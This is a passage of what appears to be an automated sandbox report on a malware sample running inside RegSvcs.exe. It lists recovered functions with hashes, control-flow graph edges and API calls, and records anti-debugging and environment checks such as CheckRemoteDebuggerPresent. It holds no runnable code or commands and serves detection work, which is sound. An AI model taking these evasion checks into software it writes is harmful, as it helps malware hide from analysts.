                                                • Instruction ID: a46783250ae8975bcb01d358f2c974771fae598147cb97ecd78c649567b4321b
                                                • Opcode Fuzzy Hash: c81cdb42d4c340a8623f32eeafba095d8ccdedf79711c7d66a346063f4c210e9
                                                • Instruction Fuzzy Hash: 3721BAB1C0025A8FDB14DFAAD4487DEFBF4AF48310F10856AD928A7350D7789846CFA1
                                                Function 01177EC8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 464 1177ec8-1177f54 CheckRemoteDebuggerPresent 467 1177f56-1177f5c 464->467 468 1177f5d-1177f98 464->468 467->468
                                                APIs
                                                • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01177F47
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1534441709.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1170000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: CheckDebuggerPresentRemote
                                                • String ID:
                                                • API String ID: 3662101638-0
                                                • Opcode ID: cb9462c08b976d03cf5d3af88e1a2a49efa3d27451af9a2d2de69711b31e69f9
                                                • Instruction ID: 9a48e6492167c61ab26eba2e697b297f39fb7acd5583ad2fd92fb8db2128c79e
                                                • Opcode Fuzzy Hash: cb9462c08b976d03cf5d3af88e1a2a49efa3d27451af9a2d2de69711b31e69f9
                                                • Instruction Fuzzy Hash: 492166B18002598FDB10CF9AD584BEEBBF4AF49220F14845AE458A3351D738A945CF61
                                                Function 0117F3E8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 477 117f3e8-117f45c GlobalMemoryStatusEx 479 117f465-117f48d 477->479 480 117f45e-117f464 477->480 480->479
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE ref: 0117F44F
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1534441709.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1170000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 1003a8d2bf4257e55ce22ff0cbba0224e7376fec6f7b7e778b81d2dcb008052c
                                                • Instruction ID: 242d5257a5c6528822209a87c666f89dae89d614a58fa8d16fc7e2973678e465
                                                • Opcode Fuzzy Hash: 1003a8d2bf4257e55ce22ff0cbba0224e7376fec6f7b7e778b81d2dcb008052c
                                                • Instruction Fuzzy Hash: 0A11F3B1C0065A9BDB14DF9AC548BDEFBF4EF48320F14812AD928A7340D778A945CFA5
                                                Function 068DFEDB Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 483 68dfedb-68dff16 497 68dff19 call 117ee58 483->497 498 68dff19 call 117ee78 483->498 485 68dff1f-68dff3e 489 68dff46-68dff70 485->489 492 68dff91 489->492 493 68dff72-68dff8f 489->493 494 68dffa3-68dffaa 492->494 493->494 497->485 498->485
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |
                                                • API String ID: 0-2343686810
                                                • Opcode ID: 01199b4ff502dd470d880d185c7a13fd50bcd93f2a6e381174ee87e3865002a7
                                                • Instruction ID: a845ce22ffed6958d2e414fa0a3aeb3e768b57cdc5acd1898207978cb0ca3e5c
                                                • Opcode Fuzzy Hash: 01199b4ff502dd470d880d185c7a13fd50bcd93f2a6e381174ee87e3865002a7
                                                • Instruction Fuzzy Hash: B521A174B083549FDB449B78C81476E7BF1AF89704F1544AEEA4ADB392DB799C00CB90
                                                Function 068DFEF8 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 499 68dfef8-68dff16 512 68dff19 call 117ee58 499->512 513 68dff19 call 117ee78 499->513 500 68dff1f-68dff3e 504 68dff46-68dff70 500->504 507 68dff91 504->507 508 68dff72-68dff8f 504->508 509 68dffa3-68dffaa 507->509 508->509 512->500 513->500
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |
                                                • API String ID: 0-2343686810
                                                • Opcode ID: 54e5a7540ba1bb4e110e7acd501d72cf2baf46a1bddbf09237c5c1faaa110553
                                                • Instruction ID: c745b4afe22cb046219d7bd28afcdf9cbdcb1018a83ad663406bb961c3a31fc5
                                                • Opcode Fuzzy Hash: 54e5a7540ba1bb4e110e7acd501d72cf2baf46a1bddbf09237c5c1faaa110553
                                                • Instruction Fuzzy Hash: CF115B75B442249FDB44AB78C805B6EBBF5AF4D704F10846AE60AEB390DB769C00CB90
                                                Function 068D4699 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 514 68d4699-68d469c 515 68d46a5-68d46e7 514->515 520 68d46e9 515->520 521 68d46f2 515->521 520->521
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \Oq
                                                • API String ID: 0-643489707
                                                • Opcode ID: 67dc7da5cd511d6bbcb8ad4ac7b9e8395bb747ce1ef70aa298f58fd4dcfc5785
                                                • Instruction ID: 8c441ca1035252a4a2397a0d4e2b203540b28d4833afc92c9c3448f526acc7ab
                                                • Opcode Fuzzy Hash: 67dc7da5cd511d6bbcb8ad4ac7b9e8395bb747ce1ef70aa298f58fd4dcfc5785
                                                • Instruction Fuzzy Hash: 09F0FE30A50129DFEB14DF94E859BADBBB2FF88704F20411AE502A7294CB755D45CF90
                                                Function 068D2379 Relevance: 1.0, Instructions: 1020COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40276cbe411bd34ad9a6632c3310a7cdaf013416e4e26199e5e102bb2e3886a4
                                                • Instruction ID: cadad76680df75b6e9c8151eec423028712bb675e3d35c660ac2c9d9d51f2959
                                                • Opcode Fuzzy Hash: 40276cbe411bd34ad9a6632c3310a7cdaf013416e4e26199e5e102bb2e3886a4
                                                • Instruction Fuzzy Hash: 0E926634A00204CFDBA4DB68C594B9DBBF2FB49314F5484A9D609EB351DB35EE81CBA1
                                                Function 068DCF50 Relevance: .8, Instructions: 794COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1822 68dcf50-68dcf6b 1823 68dcf6d-68dcf70 1822->1823 1824 68dcfb9-68dcfbc 1823->1824 1825 68dcf72-68dcfb4 1823->1825 1826 68dcfbe-68dd000 1824->1826 1827 68dd005-68dd008 1824->1827 1825->1824 1826->1827 1828 68dd02b-68dd02e 1827->1828 1829 68dd00a-68dd026 1827->1829 1831 68dd04b-68dd04e 1828->1831 1832 68dd030-68dd046 1828->1832 1829->1828 1835 68dd097-68dd09a 1831->1835 1836 68dd050-68dd092 1831->1836 1832->1831 1840 68dd09c-68dd0de 1835->1840 1841 68dd0e3-68dd0e6 1835->1841 1836->1835 1840->1841 1845 68dd12f-68dd132 1841->1845 1846 68dd0e8-68dd0f7 1841->1846 1852 68dd17b-68dd17e 1845->1852 1853 68dd134-68dd176 1845->1853 1847 68dd0f9-68dd0fe 1846->1847 1848 68dd106-68dd112 1846->1848 1847->1848 1856 68dd96d-68dd9a6 1848->1856 1857 68dd118-68dd12a 1848->1857 1858 68dd188-68dd18b 1852->1858 1859 68dd180-68dd185 1852->1859 1853->1852 1879 68dd9a8-68dd9ab 1856->1879 1857->1845 1861 68dd18d-68dd19c 1858->1861 1862 68dd1d4-68dd1d7 1858->1862 1859->1858 1871 68dd19e-68dd1a3 1861->1871 1872 68dd1ab-68dd1b7 1861->1872 1867 68dd1d9-68dd21b 1862->1867 1868 68dd220-68dd223 1862->1868 1867->1868 1875 68dd225-68dd227 1868->1875 1876 68dd232-68dd235 1868->1876 1871->1872 1872->1856 1877 68dd1bd-68dd1cf 1872->1877 1880 68dd22d 1875->1880 1881 68dd439 1875->1881 1882 68dd244-68dd247 1876->1882 1883 68dd237-68dd239 1876->1883 1877->1862 1886 68dd9ad-68dd9c9 1879->1886 1887 68dd9ce-68dd9d1 1879->1887 1880->1876 1896 68dd43c-68dd448 1881->1896 1895 68dd24d-68dd250 1882->1895 1882->1896 1892 68dd23f 1883->1892 1893 68dd2f7-68dd300 1883->1893 1886->1887 1888 68dda04-68dda07 1887->1888 1889 68dd9d3-68dd9ff 1887->1889 1897 68dda09 call 68ddac5 1888->1897 1898 68dda16-68dda18 1888->1898 1889->1888 1892->1882 1899 68dd30f-68dd31b 1893->1899 1900 68dd302-68dd307 1893->1900 1901 68dd299-68dd29c 1895->1901 1902 68dd252-68dd294 1895->1902 1896->1861 1905 68dd44e-68dd73b 1896->1905 1919 68dda0f-68dda11 1897->1919 1912 68dda1f-68dda22 1898->1912 1913 68dda1a 1898->1913 1910 68dd42c-68dd431 1899->1910 1911 68dd321-68dd335 1899->1911 1900->1899 1907 68dd29e-68dd2e0 1901->1907 1908 68dd2e5-68dd2e7 1901->1908 1902->1901 2035 68dd741-68dd747 1905->2035 2036 68dd962-68dd96c 1905->2036 1907->1908 1917 68dd2ee-68dd2f1 1908->1917 1918 68dd2e9 1908->1918 1910->1881 1911->1881 1929 68dd33b-68dd34d 1911->1929 1912->1879 1920 68dda24-68dda33 1912->1920 1913->1912 1917->1823 1917->1893 1918->1917 1919->1898 1933 68dda9a-68ddaaf 1920->1933 1934 68dda35-68dda98 call 68d61a0 1920->1934 1941 68dd34f-68dd355 1929->1941 1942 68dd371-68dd373 1929->1942 1947 68ddab0 1933->1947 1934->1933 1948 68dd359-68dd365 1941->1948 1949 68dd357 1941->1949 1946 68dd37d-68dd389 1942->1946 1960 68dd38b-68dd395 1946->1960 1961 68dd397 1946->1961 1947->1947 1953 68dd367-68dd36f 1948->1953 1949->1953 1953->1946 1963 68dd39c-68dd39e 1960->1963 1961->1963 1963->1881 1966 68dd3a4-68dd3c0 call 68d61a0 1963->1966 1974 68dd3cf-68dd3db 1966->1974 1975 68dd3c2-68dd3c7 1966->1975 1974->1910 1978 68dd3dd-68dd42a 1974->1978 1975->1974 1978->1881 2037 68dd749-68dd74e 2035->2037 2038 68dd756-68dd75f 2035->2038 2037->2038 2038->1856 2039 68dd765-68dd778 2038->2039 2041 68dd77e-68dd784 2039->2041 2042 68dd952-68dd95c 2039->2042 2043 68dd786-68dd78b 2041->2043 2044 68dd793-68dd79c 2041->2044 2042->2035 2042->2036 2043->2044 2044->1856 2045 68dd7a2-68dd7c3 2044->2045 2048 68dd7c5-68dd7ca 2045->2048 2049 68dd7d2-68dd7db 2045->2049 2048->2049 2049->1856 2050 68dd7e1-68dd7fe 2049->2050 2050->2042 2053 68dd804-68dd80a 2050->2053 2053->1856 2054 68dd810-68dd829 2053->2054 2056 68dd82f-68dd856 2054->2056 2057 68dd945-68dd94c 2054->2057 2056->1856 2060 68dd85c-68dd866 2056->2060 2057->2042 2057->2053 2060->1856 2061 68dd86c-68dd883 2060->2061 2063 68dd885-68dd890 2061->2063 2064 68dd892-68dd8ad 2061->2064 2063->2064 2064->2057 2069 68dd8b3-68dd8cc call 68d61a0 2064->2069 2073 68dd8ce-68dd8d3 2069->2073 2074 68dd8db-68dd8e4 2069->2074 2073->2074 2074->1856 2075 68dd8ea-68dd93e 2074->2075 2075->2057
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5406d87195491b5a671fa7d879bcde872d964480049ca03f6c4462b51bd0f922
                                                • Instruction ID: 5aa0ff61be131e61c783ec0152665155070ede5b723475457f73b92aee96e71c
                                                • Opcode Fuzzy Hash: 5406d87195491b5a671fa7d879bcde872d964480049ca03f6c4462b51bd0f922
                                                • Instruction Fuzzy Hash: EB625B30A00A098FCB55EF68D580A9EB7B2FF84314B20CA69D0459F355EB75ED86CB91
                                                Function 068DA8C8 Relevance: .4, Instructions: 393COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4b9c6b414e80f84b77355314b41e82ff1ad42b57e927ba0e1c5748d5b3025adc
                                                • Instruction ID: b6273081e02925e6f0fcd991fc51b05c8c3afaf39bacbba0233c9e68a6e81271
                                                • Opcode Fuzzy Hash: 4b9c6b414e80f84b77355314b41e82ff1ad42b57e927ba0e1c5748d5b3025adc
                                                • Instruction Fuzzy Hash: C9E17E30E102098FDB69DF68D4806AEB7B2FF89314F208529D905EB345EB75DD82CB91
                                                Function 068DB250 Relevance: .3, Instructions: 293COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 009b22828835c876dd343a0ffbbfac09ce1c3f4d6684043fad8ecdfb1fac590c
                                                • Instruction ID: 457e1b32c5ab0d24bb81c55127d60a40f4bcd093da719dd84b49f5b8dfa39c8c
                                                • Opcode Fuzzy Hash: 009b22828835c876dd343a0ffbbfac09ce1c3f4d6684043fad8ecdfb1fac590c
                                                • Instruction Fuzzy Hash: 0AB16CB0E002098FEFA4DF68C480BADBBB2FB49310F258566D555DB356DA34DC85CBA1
                                                Function 068D8D50 Relevance: .2, Instructions: 231COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7867089f027520cc76cb91f7508c31563de245eb64a60e8e338c592df5af5f83
                                                • Instruction ID: 50d7e38e8d567a46c03edd40c3e1b1cb7f3bf4636a5d8be2f3b382f46b35d834
                                                • Opcode Fuzzy Hash: 7867089f027520cc76cb91f7508c31563de245eb64a60e8e338c592df5af5f83
                                                • Instruction Fuzzy Hash: B0916070B506098FDB64DB68D890BAEB7B6FF88314F108469C909EB348EB70DD418F91
                                                Function 068D5DE8 Relevance: .2, Instructions: 229COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9640436430cf14e19fe9bfd64e64adca890ba065991314574abff8091f712903
                                                • Instruction ID: 5d1bfb170d19c40c1a9410dba49f0a0a714bbffcfd98d1fc8b49731955a85261
                                                • Opcode Fuzzy Hash: 9640436430cf14e19fe9bfd64e64adca890ba065991314574abff8091f712903
                                                • Instruction Fuzzy Hash: B761B371F001104FDB55AA7EC88065EBAEBAFD4620F154436D90AEB360DFB9DD0287E2
                                                Function 068DFC25 Relevance: .2, Instructions: 226COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 93e52a54f184fe49df64ba855cc0b73e4bdf81593caf6affce26dfe5bb57d5d3
                                                • Instruction ID: 1d1b00904c12151104475beb711d2e9c5f85d3a23686606eb2c0c57bd8e3a972
                                                • Opcode Fuzzy Hash: 93e52a54f184fe49df64ba855cc0b73e4bdf81593caf6affce26dfe5bb57d5d3
                                                • Instruction Fuzzy Hash: 2751E331E012059FDB18AB78E4846ADBBB2FF89314F204879E706DB251DB358955DB90
                                                Function 068D3EE1 Relevance: .2, Instructions: 222COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2850409d2104da900db61dfab4169c2e6c976a49d49193872d911851cc75c93
                                                • Instruction ID: 46e18ac00a88a1f9073c9b7255922e7d7e9014ea635f6e9c9dc3d2e650ce0804
                                                • Opcode Fuzzy Hash: a2850409d2104da900db61dfab4169c2e6c976a49d49193872d911851cc75c93
                                                • Instruction Fuzzy Hash: 64815A34B106098FDB54DBA9D9907AEBBF2BF89300F118429D50ADB345EF75DC828B91
                                                Function 068D4200 Relevance: .2, Instructions: 219COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3acf2aa45c1c3bf6fe2b057f641ed39ed04aee449b8caaa15b64d551535eb1c1
                                                • Instruction ID: b9dc2284708838ec409e6dbd1abf93338acf80b20720619548571f66e0926b51
                                                • Opcode Fuzzy Hash: 3acf2aa45c1c3bf6fe2b057f641ed39ed04aee449b8caaa15b64d551535eb1c1
                                                • Instruction Fuzzy Hash: FC912C30E102198FDF60DF68C890B9DBBB1FF89310F208599D549EB285DB75AA85CF51
                                                Function 068D4218 Relevance: .2, Instructions: 210COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c26b13bcae561ca56835ea9a33f5257a4cab90f0a072d79265e35937a7b75db
                                                • Instruction ID: aef15ee8cff613d312e64e7caa9d5a276cda051bbd70ff85467d25fb4595a0d8
                                                • Opcode Fuzzy Hash: 9c26b13bcae561ca56835ea9a33f5257a4cab90f0a072d79265e35937a7b75db
                                                • Instruction Fuzzy Hash: AB912A30E102198BDF64DF68C880B9DB7B1FF89310F208599D549FB285EB71AA85CF90
                                                Function 068DEB28 Relevance: .2, Instructions: 201COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f494b558dccef77e0562a58c2f311edbfcda098ddfbea1f56732fa7d68c15142
                                                • Instruction ID: 7e6057569f9bce6da12262da30b6fb950ac7a456a132da4af6376d6574cbfed1
                                                • Opcode Fuzzy Hash: f494b558dccef77e0562a58c2f311edbfcda098ddfbea1f56732fa7d68c15142
                                                • Instruction Fuzzy Hash: 7D714C30A006089FDB54EFA9D984AADBBF6FF88314F148429E005EB355DB74ED46CB61
                                                Function 068DEB18 Relevance: .2, Instructions: 200COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a695131f856363ef90d5702eac597a943e80f5755f1dc9b761923d051a53627
                                                • Instruction ID: 993b0f299fd41b43916e038009402cdf219291cada9f8c85a6c73f22bb9456d6
                                                • Opcode Fuzzy Hash: 4a695131f856363ef90d5702eac597a943e80f5755f1dc9b761923d051a53627
                                                • Instruction Fuzzy Hash: 25715D30A006089FDB55EFA8D984AADBBF6FF88314F248469D045EB355DB34ED46CB60
                                                Function 068DF630 Relevance: .2, Instructions: 169COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b063c69d068a554a0fb5cf7c0795d074711cd5e7e4fdf3184b05b22f8b393477
                                                • Instruction ID: dbeab6a5290958d62e00c80c0c2f8795d70003a36b37dc0adbeacfec259d4d25
                                                • Opcode Fuzzy Hash: b063c69d068a554a0fb5cf7c0795d074711cd5e7e4fdf3184b05b22f8b393477
                                                • Instruction Fuzzy Hash: F451F974B206045FFF6456ACD85076F377AEB89750F20442AD30BD7B95DA68CC81A3A2
                                                Function 068D8D4D Relevance: .2, Instructions: 164COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e727087171805c81f0d1e96e03f0cdc97b683a1e74be136dd45f218ec6a0647
                                                • Instruction ID: f6596bf747036ac1c8f8db4d59f753eba86886af7e49af174fb0f41eccd84e48
                                                • Opcode Fuzzy Hash: 5e727087171805c81f0d1e96e03f0cdc97b683a1e74be136dd45f218ec6a0647
                                                • Instruction Fuzzy Hash: 66514C70B506049FDB54DB68D890BAEB7F2FF88354F158469D90AEB388EA30DD418F91
                                                Function 068DF640 Relevance: .2, Instructions: 163COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 03d890e26aebaa8e4997741219dd84fd4b142304e83178f8ab535f332664b146
                                                • Instruction ID: 98e0f965855704f9b51ab47ca88e1cf59c10268759fb1c6542dab5263ac081f6
                                                • Opcode Fuzzy Hash: 03d890e26aebaa8e4997741219dd84fd4b142304e83178f8ab535f332664b146
                                                • Instruction Fuzzy Hash: DB51EB74B206045FEF6456ADD85476F377AEB89750F204429E30BC7B94DA68CC41A3A2
                                                Function 068D5059 Relevance: .1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa44597639909dacd298ec72134b1ff03b58260a3a8a602ac717968a32ffb1c5
                                                • Instruction ID: 836744a225be65426f9ebaa5ff52765a8f147de999b2876d4f4bb26014d4652d
                                                • Opcode Fuzzy Hash: fa44597639909dacd298ec72134b1ff03b58260a3a8a602ac717968a32ffb1c5
                                                • Instruction Fuzzy Hash: CC416D31E006099FDF70CFA9D880AAFF7F6FB85210F10892AE255D7640D731E9458BA2
                                                Function 068DDAC5 Relevance: .1, Instructions: 125COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: da53dd91cc0bba562282a6556bccb71e47de5788538a6e58fced5a74108ec1b4
                                                • Instruction ID: bec7d9303d8c2ca7816002b5c428cc0ebe05e9a5dfd7e40ab61bbc854d5c5ef5
                                                • Opcode Fuzzy Hash: da53dd91cc0bba562282a6556bccb71e47de5788538a6e58fced5a74108ec1b4
                                                • Instruction Fuzzy Hash: 1041BF30E007498FDB659F64C44069EBBB2FF85344F204929E502EB384EB74D986CBA1
                                                Function 068D2200 Relevance: .1, Instructions: 105COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c0fe2f255f536f592b2196a0746be22d6a021246f656bbb4bd13415e103c1a73
                                                • Instruction ID: bc1c4d93a2fefbacdc009949d00610f3983f6b231d1c2c11f606d50e10c6c722
                                                • Opcode Fuzzy Hash: c0fe2f255f536f592b2196a0746be22d6a021246f656bbb4bd13415e103c1a73
                                                • Instruction Fuzzy Hash: 3B31CF30B102048FDB59AB74D42476EBBE3AF89354F204568E506DB399DF75CE82CBA1
                                                Function 068DD978 Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 04e61dd1b8d29676f841f07e7fef574aa3a70901ba1627de2227b12c1a99b364
                                                • Instruction ID: 27224bf82fbf61c30a2e783098f4eebd6b3f35bc209b3007ba7f44ef0468122f
                                                • Opcode Fuzzy Hash: 04e61dd1b8d29676f841f07e7fef574aa3a70901ba1627de2227b12c1a99b364
                                                • Instruction Fuzzy Hash: 0731C630E1470A9FDF25DF68C58069EBBB6FF85304F108929E941EB204EBB4E946CB51
                                                Function 068D20B0 Relevance: .1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a531a9d11db00e68b7e32a8c89d0a7bf4e97e7dc8834a6c9cf29e9fcf85d0c39
                                                • Instruction ID: 95a3a667cd299a24da4ab68ee59c914906f7f94aa55febf51cb5b93cd40687e3
                                                • Opcode Fuzzy Hash: a531a9d11db00e68b7e32a8c89d0a7bf4e97e7dc8834a6c9cf29e9fcf85d0c39
                                                • Instruction Fuzzy Hash: B5317E34E106059FCB59DFA4D86569EB7B2FF89300F10C519EA06E7350EB71AD46CB50
                                                Function 068D20C0 Relevance: .1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Memory Dump Source
